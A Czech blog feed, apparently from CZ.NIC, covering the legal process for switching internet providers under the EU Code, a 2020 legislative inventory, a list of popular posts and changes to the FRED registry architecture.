Hosting

Přihlášení

@ IN SOA domény.dns.enum.mojeid.internet. nic.cz.
Aktualizace: 46 min 25 sek zpět

Krátké vlny (12. díl) – Utopen v Kodexu (1) – Změna poskytovatele služby přístupu k Internetu

Čt, 01/14/2021 - 10:30

Dne 21. prosince 2020 uplynula lhůta pro implementaci Kodexu pro elektronické komunikace, který obsahuje revidovaná sektorová pravidla pro členské státy, regulátory, operátory a spotřebitelé. Česká republika se řadí do skupiny většiny států, které tuto lhůtu zatím nechaly marně uplynout.

Nicméně i když v Poslanecké sněmovně ještě nebylo zahájeno první čtení implementační novely zákona o elektronických komunikacích (lednová schůze začíná 19. ledna 2021), pan poslanec Martin Jiránek, zpravodaj této novely a předseda Podvýboru pro ICT, telekomunikace a digitální ekonomiku v jedné osobě, uspořádal dne 5. ledna 2021 jednání podvýboru, který měl na programu možné úpravy předkládaného tisku.

Jedním z bodů, u kterého bylo naznačeno, že by si zasloužil úpravu, byl nový institut změna poskytovatele služby přístupu k Internetu. O co se jedná?

Evropští zákonodárci (členské státy a Evropský parlament) podpořili návrh Evropské komise a schválili zákonnou regulaci postupu změny poskytovatele služby přístupu k internetu. Jedná se o obdobu přenositelnosti čísla, což bylo v roce 2002 (při schválení původního regulačního rámce) považováno za jedno z prokonkurenčních a prospotřebitelských opatření. Každý účastník má právo přenést si své číslo ke konkurenci. A nyní pozor, novinka pro rok 2021, každý účastník má právo vybrat si nového poskytovatele služby přístupu k Internetu a ten za něj zařídí přechod od starého poskytovatele.

Kodex považuje možnost měnit poskytovatele za klíčový předpoklad účinné hospodářské soutěže v konkurenčním prostředí. Dostupnost transparentních, přesných a včasných informací týkajících se změny má slovy Kodexu zvýšit důvěru koncových uživatelů ve změnu a vybídnout je k tomu, aby se stali aktivními účastníky hospodářské soutěže. Poskytovatelé služeb by na druhou stranu měli zajistit kontinuitu služeb tak, aby koncoví uživatelé měli možnost změnit poskytovatele, aniž by jim hrozilo přerušení služby, a je-li to z technického hlediska proveditelné, umožnit změnu k datu, o které koncoví uživatelé požádají.

Kodex dává oprávnění regulátorům stanovit podrobnosti postupu pro změnu poskytovatele (s ohledem na vnitrostátní předpisy týkající se smluv, na technický rozvoj a na potřebu zajištění kontinuity). Pokud je to technicky proveditelné, preferuje Kodex dokončení převodu metodou OTA (over-the-air), pokud koncový uživatel nepreferuje jinou metodu. Regulátoři také musí zajistit, aby v průběhu přenosu měl uživatel přiměřené informace a ochranu (a aby nedocházelo k převodu proti jejich vůli).

Členské státy mají také stanovit pravidla pro snadné a včasné odškodnění koncových uživatelů ze strany poskytovatelů pro případ, že by poskytovatelé nedodrželi stanovené povinnosti, zpozdili se nebo bylo zneužito postupů, nebyly dodrženy dohodnuté termíny opravy nebo instalace.

Jak se s tím popralo Ministerstvo průmyslu a obchodu v návrhu implementační novely?

Nový § 34a garantuje každému účastníkovi, který o to požádá, právo na změnu poskytovatele služby přístupu k Internetu, tak aby byla zajištěna kontinuita poskytovaných služeb s dovětkem, pokud je to technicky možné.

Zákon ukládá poskytovatelům přístupu k Internetu, kteří jsou dotčeni tímto rozhodnutím, poskytnout účastníkovi odpovídající informace a spolupracovat na zajištění změny poskytovatele služby přístupu k Internetu.

Změna poskytovatele je koncipovaná (obdobně jako současná přenositelnost čísel) jako tzv. one stop shop řešení. Účastník, který chce změnit svého poskytovatele přístupu k Internetu osloví vyhlídnutého nového operátora (v zákonné terminologii přejímajícího poskytovatele služby přístupu k internetu) a požádá ho o zajištění změny.

Účastník musí vyplnit žádost, kde uvede své identifikační údaje (poskytovatel má právo ověřit totožnost účastníka), identifikační údaje opouštěného poskytovatele služby, služby, které mají být předmětem změny poskytovatele služby přístupu k Internetu, den provedení změny a ověřovací kód, který má vydávat opouštěný poskytovatel.

Zákon stanovuje lhůtu jednoho pracovního dne pro přejímajícího poskytovatele, aby po obdržení žádosti informoval opouštěného poskytovatele o žádosti a dni, ke kterému má změna proběhnout. V této fázi musí dojít k ověření, zda změna poskytovatele může proběhnout, nebo zda existují důvody, kdy bude účastník odmítnut.

Naopak zákon nestanovuje žádnou explicitní lhůtu, ve které má dojít k aktivaci služeb u nového poskytovatele. Zákon říká, že má k aktivaci služeb dojít k nejkratší možné době, nebo ve lhůtě dohodnuté s účastníkem. Přerušení poskytování služby během změny poskytovatele nesmí podle ustanovení zákona přesáhnout 1 pracovní den. To se bude týkat případů, kdy opouštěný i přejímající operátor poskytují službu přístupu k internetu na společné infrastruktuře. Může se jednat o situaci, kdy oba podnikatelé mají stejného velkoobchodního partnera, nebo pokud je potřeba využít stejnou vnitřní infrastrukturu.

Český telekomunikační úřad získal zmocnění k vydání vyhlášky, kterou má stanovit technické a organizační podmínky pro realizaci změny poskytovatele služby přístupu k Internetu mezi podnikateli, včetně souvisejících postupů a lhůt.

Účastník má ze zákona právo na paušální náhradu, pokud dojde při změně ke zpoždění, nebo dojde ke zneužití změny v důsledku porušení povinnosti dotčených poskytovatelů služby, případně pokud dojde k nedodržení dohodnutých termínů opravy a instalace. Způsob určení paušální náhrady má stanovit vyhlášku, kterou má vydat Ministerstvo spravedlnosti ve spolupráci s Ministerstvem průmyslu a obchodu. Zákon stanovuje spodní (sto korun denně) a horní hranici (tisíc korun denně) této paušální náhrady. Účastník má současně možnost uplatnit své právo na náhradu škody.

Včera, 13. ledna 2021, uspořádal k přípravě výše uvedené prováděcí vyhlášky Český telekomunikační úřad workshop, na který rozeslal podkladový dokument. Celý podklad a proces je nastaven na základě předpokladu, že operátoři vybudují tzv. společné řešení, které má umožňovat vzájemnou informovanost mezi přejímajícím a opouštěným poskytovatelem služby přístupu k Internetu a zároveň toto řešení má zajistit transparentnost jednotlivých kroků. Toto společné řešení má vytvořit a spravovat sektor (obdobně jako je to v případě referenční databáze pro přenositelnost telefonních čísel).

Samotný proces změny poskytovatele rozdělil ČTÚ do pěti fází.

FÁZE 0

Fáze nula sice nemá být podle ČTÚ upravena vyhláškou, ale její existence a hladký průběh je základním předpokladem k tomu, aby byl proces změny úspěšný. V této fázi kontaktuje účastník přejímajícího poskytovatele služby a ten by mu měl poskytnout všechny důležité informace pro změnu a zároveň od něj zjistit vše potřebné pro zřízení nové služby. Jedna z nejdůležitějších informací, kterou v této fázi může nový poskytovatel dostat, jsou data o existenci případného balíčku, ve které je služba přístupu k Internetu zahrnuta a zda a jak může mít změna poskytovatele vliv na cenu a fungování ostatních služeb, které jsou obsaženy v balíčku.

Definici balíčku služeb odkazuje ČTÚ na formulář pro sběr dat, kdy balíčkem se rozumí kombinace několika služeb (dvou a více, z nichž jedna je službou přístupu k Internetu) nabízených za jednu společnou cenu nebo za jednotlivé ceny se slevou, která pro účastníka zpravidla představuje cenovou úsporu v porovnání s nákupem jednotlivých služeb.

Aby to nebylo jednoduché, obsahem balíčku může být však i jiná služba, která nespadá pod okruh služeb elektronických komunikací, např. další specializované služby typu monitorování a ostraha budov, odběr energií apod.

Upřímně tohle může být úzké hrdlo celého procesu, protože průměrný uživatel služeb elektronických komunikací nemusí mít v hlavě všechny informace o čerpaných službách v balíčku a jejich vzájemnou vazbou. Tyto informace, pokud nebudou obsahem společného řešení, nebude mít ani přejímající poskytovatel služby a bude zde tedy nutná součinnost opouštěného operátora již v této „fázi 0“. Pokud výměna informací nezafunguje, změny chtivý zákazník se po realizaci změny může dočkat nepříjemného překvapení v podobě nefunkční nějaké služby v balíčku, nebo zvýšené ceny.

FÁZE 1

Fáze jedna by měla zahrnovat podání žádosti o změnu. Formát ověřovacího kódu si mají dohodnout operátoři mezi sebou, musí však respektovat podmínky všeobecného oprávnění VO-S 1.

FÁZE 2

Ve fázi dvě dojde k potvrzení nebo k odmítnutí objednávky opouštěným poskytovatelem.

Jako důvody odmítnutí vidí ČTÚ (prozatím) tyto:

a) k danému účastníkovi (službě) již opouštěný poskytovatel eviduje jinou objednávku (rozhoduje čas obdržené objednávky),

b) neúspěšná autorizace (např. ověřovací kód nebyl vydán účastníkovi, který o změnu žádá),

c) údaje v objednávce nejsou správné.

ČTÚ předpokládá, že lhůta pro reakci opouštěného operátora bude stanovena také na 1 pracovní den (protože Kodex předpokládá, že změna proběhne v co nejkratším čase).

FÁZE 3

Fáze tři má sloužit k realizaci změny poskytovatele služby přístupu k Internetu, pokud účastník nedostane informaci o tom, že jeho žádost byla z výše uvedených důvodů odmítnuta.

Poslední fází je úspěšné zřízení nové služby u nového poskytovatele služby přístupu k Internetu. ČTÚ předpokládá, že pokud se bude změna realizovat na společné infrastruktuře, může dojít k přerušení poskytování služby z důvodu technického přepojení. Zákon stanovuje maximální lhůtu pro přerušení 1 pracovního dne, ČTÚ však předpokládá, že přerušení bude kratší, v řádu hodin.

Zdroj: prezentace ČTÚ

Výživná diskuze na workshopu skončila dohodou, že zástupci sektoru pošlou případné připomínky do konce ledna. ČTÚ připraví návrh vyhlášky a zřejmě uspořádá před samotným meziresortem další workshop s cílem najít shodu na finální podobě. Finální podoba samozřejmě bude mít vliv na čas nutný pro implementaci řešení. Na workshopu odhadli operátoři lhůtu na samotnou implementaci společného řešení na devět měsíců.

Kategorie:

Deset nejčtenějších článků roku 2020 aneb Co vás nejvíce zaujalo?

Po, 01/11/2021 - 10:50

Už několik let si v našem internetovém zápisníku můžete přečíst pravidelnou dávku novinek a zajímavostí ze světa (českého) Internetu a internetových technologií. Nebylo tomu jinak ani v roce 2020, ve kterém vzešlo z klávesnic našich autorů celkem 52 článků. Mezi nejvyhledávanější pak patřily ty, které se věnovaly vypnutí starých ODVR a obecně oblasti DNS. V těsném závěsu pak zůstaly příspěvky zabývající se projektem Turris, infrastrukturou nebo bezpečností a s ní související osvětou. Také stojí za zmínku nový seriál Krátké vlny, který přinášel pravidelný přehled novinek z digitální džungle.

Pokud vaší pozornosti některé blogposty unikly, můžete zamířit do našeho archivu nebo pro urychlení využít náš výběr těch, které patřily mezi nejpopulárnější:

1. 20. ledna vypínáme staré ODVR. Nebo ne?

Důležité datum vám ve svém příspěvku připomněl Zdeněk Brůna, technický ředitel, který upozornil na to, že se v 20. ledna vypnula první část platformy starých ODVR:

Pro ty zkušenější, ještě znovu opakuji výzvu pro změnu zcela konkrétně. Zapomeňte prosím na: 217.31.204.130, 2001:1488:800:400::130 a 193.29.206.206, 2001:678:1::206, přejděte včas na: 193.17.47.1, 2001:148f:ffff::1 a 185.43.135.1, 2001:148f:fffe::1. …

2. Hledání škodlivého kódu mezi doplňky

Bezpečnostní analytik CSIRT.CZ, Edvard Rejthar, ve svém článku upozornil na škodlivý kód ukrytý v doplňcích prohlížeče:

…Před několika dny jsem si povšiml, že jistá stránka se mi připojila na doménu huffily.mydiaconal.com. Zvláštně vyhlížející jméno. O co může jít?…“

Rádi bychom doplnili poznámku, že CSIRT.CZ hrozbu předal společnosti Avast Software, která jeho zjištění podrobně analyzovala a objevila nebezpečný malware celkem ve dvaceti osmi oblíbených doplňcích prohlížečů společností Google a Microsoft. Podrobný report si můžete přečíst na https://threatpost.com/3m-users-malicious…/162350/

3. Nová verze Turris OS 5.0 je venku

Novinky související s operačním systémem Turris (5.0) vám dopodrobna představil programátor z týmu Turris, Josef Schlehofer:

…Nyní se pojďme podívat na to nejzajímavější, co nám OpenWrt 19.07 přináší. Současně s tím vám představíme změny, které jsme si pro vás přichystali, a na kterých ještě děláme. …“

4. Aktuální statistiky o celosvětovém vývoji COVID-19 na jednom místě

Další zdařilý kousek kolegy Edvarda Rejthara se tentokrát týkal tématu pandemie COVID-19. Na jaře letošního roku vytvořil nástroj pro celosvětové korelační modelování a návod, jak tento nástroj používat, pak sepsal ve svém blogpostu:

…Prioritou pro nás bylo umožnit zobrazit všechna dostupná území….A teď už k funkcionalitě. Z důvodu velké složitosti je většina ovládacích prvků zpočátku skryta. Vpravo naleznete menu, kde lze zapnout jednotlivé panely….“

5. Jak se zapojit do Dne bezpečnějšího internetu?

Inspiraci pro aktivity na Den bezpečnějšího Internetu 2020 vám zprostředkoval Jiří Průša:

Již téměř tradičně si každé druhé únorové úterý připomínáme Den bezpečnějšího internetu. Ten letošní připadá na 11. února a v rámci projektu Bezpečně na netu bychom jej rádi využili především k osvětě a prevenci. …

6. Zranitelnost frameworku Nette se může týkat tisíců .CZ domén, odhalil DNS Crawler

Spolupráce mezi týmy sdružení přinesla ne jeden užitečný výsledek. Mezi ně můžeme počítat i dopad zranitelnosti frameworku Nette na .CZ domény, o kterém informoval bezpečností analytik CSIRT.CZ, Filip Pokorný:

„… V současné chvíli se nám podařilo skrze data získaná DNS crawlerem identifikovat přes 36 tisíc českých domén, na kterých je dostupný web postaven na Nette frameworku. …“

7. Jak zabavit děti v období koronavirových prázdnin? Bezpečně.

Text kolegyně Michaely Radotínské se zdá být stále aktuální, i když ho sepsala už v březnu loňského roku. Proto, kdo už neví, jak by doma zabavil své děti a zároveň je účinně vedl ke vzdělávání, může najít nějaké tipy v jejím příspěvku:

…Níže vám dáváme náměty, jakým způsobem můžete s dětmi pracovat a o čem si s nimi povídat. Zadejte jim nejprve úkol (najdete v odkazech) a poté ho s nimi rozeberte. …“

8. NXNSAttack: aktualizujte své resolvery a zastavte nový druh útoku náhodnými dotazy

Článek Petra Špačka informoval o NXNSAttack – nově objevené zranitelnosti protokolu DNS, která postihuje většinu rekurzivních DNS resolverů:

„… Nově objevená zranitelnost zneužívá delegační mechanismus v DNS protokolu k tomu, aby DNS resolvery posílaly velké množství DNS dotazů na autoritativní servery podle přání útočníka. Jak je to možné? …“

9. Spouštíme DNS crawler

Na začátku června loňského roku uvedli Laboratoře CZ.NIC a CSIRT.CZ do produkčního provozu nový nástroj – DNS crawler, který periodicky prochází všechny domény 2. úrovně pod TLD .cz, získává o nich různá veřejně dostupná data a ta pak dále zpracovává. Více se o novince rozepsal ve svém příspěvku vedoucí Laboratoří CZ.NIC, Ladislav Lhotka:

„… Počítáme s pravidelnými běhy ve dvou periodách: většina datových položek se bude sbírat každý týden, pouze obsah hlavních webových stránek <doména>.cz nebo www.<doména>.cz se bude stahovat jen jednou měsíčně. …“

10. Opouštíme původní klec v datacentru

V únoru napsal Václav Steiner, vedoucí administrátorů CZ.NIC, poslední díl seriálu o stěhování našich technologií do privátního sálu v ČRa Tower:

…Původní klec jsme opustili ve čtvrtek 30. ledna v 11:00, tedy 189 dní po převzetí vybudovaného privátního sálu. Splnili jsme tedy nejen všechny body z projektu, ale zvládli jsme to podle plánu. …“

Závěrem bychom vám rádi poděkovali za přízeň a ujistili vás, že i letos vám přineseme celou řadu zajímavých textů našich kolegů. Pokud chcete patřit mezi jejich první čtenáře, sledujte nás na sociálních sítích Facebook, TwitterLinkedIN nebo se rovnou přihlaste k odběru našich blogpostů.

Kategorie:

Krátké vlny (11. díl) – Legislativní inventura na konci roku 2020

Čt, 12/31/2020 - 09:47

Rok 2020 nebyl jen rokem covidových zákonů, opatření, vyhlášek a nařízení. I přes první a druhou vlnu se vláda snažila držet svého „legislativního jízdního řádu“ resp. Plánu legislativních prací na rok 2020. Plán legislativních prací je veřejný dokument a celkem dobře dává člověku přehled, co se chystá v  oblasti zákonodárné. Bohužel nebo bohudík – záleží, na které straně barikády se zrovna pohybujete, to není výčet kompletní, protože ministerstva mohou samozřejmě předkládat i jiné návrhy, které nejsou součástí legislativního plánu (i když by tento fakt měly nějak odůvodnit).

Existuje i Plán nelegislativních prací vlády, bohužel tento dokument veřejný není.

Pojďme si zkusit udělat na konci roku malou inventuru. Z  celého plánu jsem vybral návrhy, které směřují do digitálního světa. Pokud by vám zde nějaká legislativní iniciativa chyběla, napište, dohledám a přidám do seznamu. A malý spoiler na začátku – o zahrádkářském zákonu už psát nebudu.

Plánovaný měsíc projednání

Název

Předkladatel

Stav

Leden Návrh zákona, kterým se mění zákon č. 480/2004 Sb., o  některých službách informační společnosti a o změně některých zákonů (zákon o některých službách informační společnosti), ve znění pozdějších předpisů Ministr průmyslu a obchodu Návrh vláda projednala 5. října 2020. V  Poslanecké sněmovně je projednáván pod číslem sněmovního tisku 1047. Tedy měl by být projednáván, bohužel do dnešního dne neprošel do prvního čtení.

  Návrh zákona o službách platforem pro sdílení videonahrávek a o změně zákona č. 231/2001 Sb., o provozování rozhlasového a televizního vysílání a o změně dalších zákonů, ve znění pozdějších předpisů, zákona č. 132/2010 Sb., o  audiovizuálních mediálních službách na vyžádání a o změně některých zákonů (zákon o audiovizuálních mediálních službách na vyžádání), ve znění pozdějších předpisů Ministr kultury Návrh vláda projednala 17. srpna 2020. V  Poslanecké sněmovně je projednáván pod číslem sněmovního tisku 981. Tedy měl by být projednáván, bohužel do dnešního dne neprošel do prvního čtení. Návrh stavebního zákona

  Ministryně pro místní rozvoj Návrh vláda projednala 24. srpna 2020. V  Poslanecké sněmovně je projednáván pod číslem sněmovního tisku 1008. Jednání ve výborech byly v  prvním čtení přerušeny, pokračování je naplánováno 6. ledna 2021 na Hospodářském výboru. Březen Návrh zákona, kterým se mění zákon č. 127/2005 Sb., o  elektronických komunikacích a o změně některých souvisejících zákonů (zákon o elektronických komunikacích), ve znění pozdějších předpisů Ministr průmyslu a obchodu Návrh vláda projednala 9. listopadu 2020. V  Poslanecké sněmovně je projednáván pod číslem sněmovního tisku 1084. Tedy měl by být projednáván, bohužel do dnešního dne neprošel do prvního čtení. Září Návrh zákona, kterým se mění zákon č. 181/2014 Sb., o  kybernetické bezpečnosti a o změně souvisejících zákonů (zákon o kybernetické bezpečnosti), ve znění pozdějších předpisů Předseda vlády a ředitel NÚKIB Návrh vláda projednala 23. listopadu 2020. V  Poslanecké sněmovně je projednáván pod číslem sněmovního tisku 1100. Tedy měl by být projednáván, bohužel do dnešního dne neprošel do prvního čtení. Návrh zákona, kterým se mění zákon č. 121/2000 Sb., o právu autorském, o právech souvisejících s právem autorským a o změně některých zákonů (autorský zákon), ve znění pozdějších předpisů, a zákon č. 89/2012 Sb., občanský zákoník, ve znění pozdějších předpisů Ministr kultury Návrh nebyl projednán, meziresortní připomínkové řízení skončilo 7. prosince 2020.  Prosinec Věcný záměr zákona o vyvlastnění Ministryně pro místní rozvoj Návrh nebyl projednán, meziresortní připomínkové řízení skončilo 15. září 202029. prosince 2020 dokument přijal Úřad vlády.

 

Zdá se, že ačkoliv většina novel zákonů, které jsou obsaženy a plánovány v  Plánu legislativních prací vlády pro rok 2020, jsou transpozicí evropských norem, neznamená to, že mají automaticky zajištěné přednostní projednání, resp. že vůbec budou projednány včas. Přestal platit argument – jedná se o implementaci, hrozí nám pokuta za nesplnění transpoziční povinnosti. Což asi i vysvětluje snahu Evropské komise stále více návrhů předkládat formou nařízení, které mají přímý dopad a jsou méně závislé na schopnosti členských států přijmout své vlastní zákony.

Stručná rekapitulace, čeho se návrhy posunuté do Poslanecké sněmovny týkají.

Zákon o některých službách informační společnosti má adaptovat do českého právního řádu nařízení Evropského parlamentu a Rady (EU) 2019/1150 ze dne 20. června 2019 o podpoře spravedlnosti a transparentnosti pro podnikatelské uživatele online zprostředkovatelských služeb, kterým se stanoví vymezení obchodních vztahů mezi poskytovateli internetových zprostředkovatelských služeb a podnikatelskými uživateli jejich služeb. Po jeho schválení získá Český telekomunikační úřad novou agendu, který bude po přijetí zákona dohlížet nad dodržováním povinností z tohoto nařízení.

 

Návrh zákona o kybernetické bezpečnosti má za cíl upravit dvě oblasti:

a) adaptace českého právního řádu na nařízení Evropského parlamentu a Rady (EU) 2019/881 ze dne 17. dubna 2019 o agentuře ENISA („Agentuře Evropské unie pro kybernetickou bezpečnost“), o certifikaci kybernetické bezpečnosti informačních a komunikačních technologií a o zrušení nařízení (EU) č. 526/2013 („akt o kybernetické bezpečnosti“) a

b) upravit kompetence vládního a národního CERT pracoviště.

 

Návrh zákona o elektronických komunikacích je předkládán z důvodu transpozice směrnice Evropského parlamentu a Rady (EU) 2018/1972 ze dne 11. prosince 2018, kterou se stanoví evropský kodex pro elektronické komunikace („Kodex“). Tato norma přinese do českého právního řádu po přenositelnosti čísel i například změnu poskytovatele služby přístupu k  Internetu, rozšíření kompetencí ČTÚ ve správě rádiového spektra nebo posílení ochrany spotřebitele dalšími povinnými náležitostmi a jejich částečného uplatnění i pro malé a střední podniky nebo neziskové organizace. Legislativní rada měla také problém s množstvím opatření obecné povahy, které považovala za maskované vyhlášky, takže v  příštím roce – po přijetí novely – bude regulátor muset upravit část prováděcích právních aktů.

Dne 19. září uplynula transpoziční lhůta směrnice Evropského parlamentu a Rady 2018/1808 ze dne 14. listopadu 2018, kterou se mění směrnice 2010/13/EU o koordinaci některých právních a správních předpisů členských států upravujících poskytování audiovizuálních mediálních služeb (směrnice o audiovizuálních mediálních službách). Úprava je odůvodňována faktem měnící se situace na trhu. Asi nepočítali s neměnnou situací v (ne)projednávání v  Poslanecké sněmovně.

Snaha o rekodifikaci stavebního zákona silně zaměstnávala také telekomunikační sektor, vždyť jen k  původnímu návrhu přišlo přes pět tisíc připomínek. Ministerstvo pro místní rozvoj si pochvaluje, že výsledek předložený Poslanecké sněmovně je vyváženým kompromisem mezi veřejnými a soukromými zájmy, který zároveň zajistí konkurenceschopnost naší země vůči okolním státům. Současně však avizuje nutnost komplexního pozměňovacího návrhu. Tak nevím.

Kromě výše zmíněných norem explicitně zmíněných v Plánu legislativních prací vlády, zaměstnávalo naši pozornost Vojenské zpravodajství, resp. novela jejich zákona, která jim nově svěřuje kompetence v  oblasti kybernetické obrany. Návrh zákona, po projednání ve výborech, kde byly načteny pozměňovací návrhy, nyní trpělivě čeká na druhé čtení po číslem sněmovního tisku číslo 800.

Na pořadu poslední schůze Poslanecké sněmovny najdeme i další legislativní aktivity, které měly ambici zasáhnout do našeho digitálního života. A teď nemyslím daňový balíček, o kterém v době psaní tohoto textu není zřejmé, zda jej prezident (neúmyslně) vetoval či nikoliv.

Sněmovní tisk 658 obsahující vládní návrh zákona o dani z digitálních služeb uvízl v září ve druhém čtení, a ačkoliv s výnosem z této daně počítá státní rozpočet na rok 2021, nevypadá to na nějaké zrychlené projednávání.

Sněmovní tisk 756 obsahuje pod krycím jménem DEPO vládní návrh zákona v  souvislosti s  elektronizací postupů orgánů veřejné moci. O něm se v  souvislosti s  automatickým zakládáním datových schránek pro fyzické osoby i podnikatele rozepsal Jiří Peterka. Návrh je samozřejmě mnohem širší a po 10 letech má ambici posunout český eGovernment o kousek dál. Bohužel opět to dělá partyzánským způsobem – vláda přijme návrh zákona, který je v  podstatě jen nosič pro komplexní pozměňovací návrh, který se horečně připravuje a píše v Poslanecké sněmovně (nebo jejích kuloárech). Bohužel, jak je vidět i z tohoto přehledu, je to čím dál častější legislativní technika současné vládnoucí garnitury.

Ambici posunout Česko v hodnocení zavádění eGovernmentu má i elektronická identifikace formou bankovní identity. Ta se v roce 2020 intenzivně připravovala a v roce 2021 slibuje zpřístupnit služby eGovernmentu až 5,5 milionu uživatelů (kteří získají možnost přihlásit se k těmto službám prostřednictvím své bankovní identity). Jak ale upozornil Kamil Zmeškal na Twitteru, nemusí být situace nakonec až tak růžová a jednoznačná. Jsou banky připraveny na situaci, kdy jejich klient nebude chtít bankovní identitu? Pokud budu preferovat jiné identitní prostředky jako třeba eObčanku nebo mojeID, mohu si bankovní identitu zablokovat/nezřídit? Pamatuji si křik a správní řízení regulátora, když operátor proti vůli zákazníka zapínal nevyžádané služby.

Jsem zvědav na PR komunikaci státu o elektronické identifikaci, kde tyto důležité detaily vysvětlí (věřím, že nediskriminačně a srozumitelně). A netýká se to jen komunikace se státem, novelou zákona o některých opatřeních proti legalizaci výnosů z trestné činnosti se bankovní identita může stát významným identitním prostředkem pro soukromoprávní operace (původní sněmovní tisk 909, vyhlášen ve Sbírce zákonů 17. prosince 2020 pod číslem 527/2020).

 

Na „čekačce“ jsou také Výroční zpráva českého rozhlasu za rok 2017, Výroční zpráva Českého telekomunikačního úřadu za rok 2018 a 2019, Výroční zpráva o hospodaření České televize v roce 2018 a 2019 a Výroční zpráva o činnosti České televize v roce 2018 a 2019.

Dopady řešení epidemie COVID-19 se formálně odrazily i v přechodu na DVB-T2, kdy jeho realizace musela být přerušena v  období březen–červen 2020 z důvodu nouzového stavu. Protože přechod se řídil technickým plánem, který vláda přijala formou nařízení, o přerušení a restartu musela rozhodnout vláda – nařízení vlády č. 259/2020 Sb. a nařízení vlády č. 268/2020 Sb.). Celý proces byl dokončen k  31. říjnu 2020 věcně tak, jak předpokládal původní plán přechodu.

Na co se můžeme těšit v roce 2021?

Na volby. Rok před volbami zcela mění atmosféru v Poslanecké sněmovně a pokud platí, že každé zasedání zákonodárného sboru (nebo vlastně i vlády, když se podíváme na protikovidová opatření) je podnik s velmi  nejistým výsledkem, v předvolebním roce to platí dvojnásobně. A snad i proto je Plán legislativních prací vlády pro rok 2021 tenčí než obvykle. K již výše zmíněným legislativním aktivitám, které nestihla vláda a Poslanecká sněmovna přijmout, můžeme přidat novelu nařízení vlády č. 109/2008 Sb., o podmínkách poskytování zvláštních cen veřejně dostupné telefonní služby (tady se můžeme dočkat i nového názvu, neboť slevu by mělo být možné uplatnit nejen na „telefonní službu“, ale i na další služby elektronických komunikací), novelu nařízení o stanovení výše a způsobu výpočtu poplatku za využívání rádiových kmitočtů a čísel (bude se zdražovat nebo zlevňovat?), novelu zákona o ochraně spotřebitele (evropská transpozice).

Dnešní Krátké vlny mají být poslední v roce 2020. Proto bych Vám chtěl na konci dnešního vysílání popřát úspěšný rok 2021, ať už úspěch počítáte v jakýchkoliv jednotkách, zdraví a vnitřní pohodu. A nám všem přeji transparentní přípravu kvalitní legislativy (tam kde je to opravdu nutné) a zdravý selský rozum v těch ostatních případech.

Kategorie:

Hezké a klidné svátky a vše dobré v novém roce

Po, 12/21/2020 - 10:56

Vážení čtenáři našeho blogu, děkujeme vám za vaši přízeň a přejeme vám krásné Vánoce a šťastný nový rok. Těšíme se na viděnou v roce 2021.

Kategorie:

Změny v architektuře systému FRED

Čt, 12/17/2020 - 12:05

Od své první verze urazil FRED dlouhou cestu a výrazně se změnil. Z původně relativně malého projektu postupem času nabobtnal o další moduly související s registrem a nastal čas jej výrazněji rekonstruovat. Došlo i k posunům ve způsobu návrhu rozhraní, správy projektu i k technologickým změnám. Od původního způsobu se specifickým rozhraním pro každého klienta jsme přešli k obecnějším a menším rozhraním, které si každý klient může zkombinovat podle svých potřeb. Podobně přecházíme i k modulární architektuře zdrojového kódu a v neposlední řadě nahrazujeme technologii Corba za gRPC. Další značnou nevýhodou velkého systému je úzká a špatně definovaná provázanost jednotlivých částí, která zpomaluje reakci na nové požadavky.

Modularita se přitom nedotýká jen samotných služeb, ale i jejich datových úložišť. Již řadu let jsou data registru rozdělena do dvou databází, registru samotného a databáze logů. Nicméně databáze registru samotná již dosahuje 100 GB a její rozdělení by výrazně ulehčilo její údržbu. Jednou z největších částí je přitom archiv zpráv, který zabírá cca třetinu její velikosti.

Změny v architektuře jsme zahájili již v roce 2018 založením nového administračního rozhraní Ferda (práce všeho druhu). Současně s tímto rozhraním jsme zahájili postupný přepis služeb registru. Ferda tak pracuje výhradně s gRPC službami, z nichž každá spravuje právě jeden logický celek.

Letošní změny byly motivovány zejména nahrazením zastaralého projektu pyfred, který stále používá Python 2.7. Vzhledem k jeho stavu jsme se rozhodli jej dále neudržovat, ale nahradit ho zcela novými projekty, jež nahradí jeho služby. Největší položkou jsou přitom právě moduly pro odesílání zpráv. Kromě samotného oddělení poskytne již dlouho chybějící vlastnosti, zejména sjednocení šablon pro různé typy zpráv, správu šablon, větší možnosti v archivaci a snazší integraci vlastních rozšíření. Mezi dalšími novinkami jsou nové moduly pro generování zóny a logování, ve vývoji je také modul pro generování statistik. Výraznou změnou prochází také automatická správa DNS klíčů. Ta mimo jiné umožní skenování z více lokalit.

Přehled změn v architektuře FREDa (zeleně nové moduly, červeně nahrazované):

Kategorie:

Krátké vlny (10. díl): Mokré sny sledovačů, aktivity anti-sledovačů a malé radosti

Čt, 12/10/2020 - 09:48

Výhodou krátkých vln je způsob jejich šíření v atmosféře – díky mnohonásobným odrazům, k nimž dochází na ionizovaných částicích ve vyšších vrstvách (ionosféra), není nutná přímá dohlednost mezi vysílačem a přijímačem, takže jejich vzájemná vzdálenost může dosáhnout i tisíců až desítek tisíc kilometrů. Slabinou jsou naopak nestabilní podmínky šíření. Prostřednictvím krátkých vln se často vysílají zahraniční programy rozhlasových stanic do zemí, kde je omezená svoboda projevu nebo kde je zavedena cenzura.“ (zdroj: Wikipedia)

Prosinec je zvláštní měsíc. Finalizujeme úkoly, plníme termíny, bojujeme s nervozitou, davy a v duchu se těšíme na vánoční pohodu klidu a míru. Covid, nouzový stav, otevírání/zavírání restaurací tomu tento rok dodávají další dimenzi.

I rytmus státní správy se zrychluje, důvodů je obvykle více, jedním je kontrolní odečet úkolů z plánů legislativních a nelegislativních prací, dalším je zavření státní pokladny na pár dní na konci roku. Takže je potřeba včas a rychle zúřadovat došlé faktury (nebo správně nastavit splatnost). Mimochodem je fajn, že datová sada „faktury“ si našla své místo v Katalogu otevřených dat a stálice úřadů, která podporují otevřená data tyto datové sady publikují. Pamatuji si, že když jsme k tomuto kroku přistoupili na Českém telekomunikačním úřadu, pomohlo nám to udělat si větší pořádek v interní evidenci. Samozřejmě záleží, jak si nastavíte výchozí filtr.

Vyčerpávající zrychlení je vidět všude. I v Poslanecké sněmovně, kde jsou svolány tři schůze a další dvě jsou přerušeny.

71. schůze

Vládní návrh zákona, kterým se mění občanský zákoník a občanský soudní řád (první čtení)
Novela insolvenčního zákona

Přerušeno

72. schůze

Klasická „prosincová“ schůze – na programu 493 bodů

Přerušeno

76. schůze

Návrh na prodloužení doby nouzového stavu
Návrh novely krizového zákona (sněmovní tisk 1111)

Od 9. 12. 2020

75. schůze

Novela zákona o řízení ve věcech soudců, státních zástupců a soudních exekutorů
Novela zákona o soudech a soudcích
Návrh zákona o lobbování
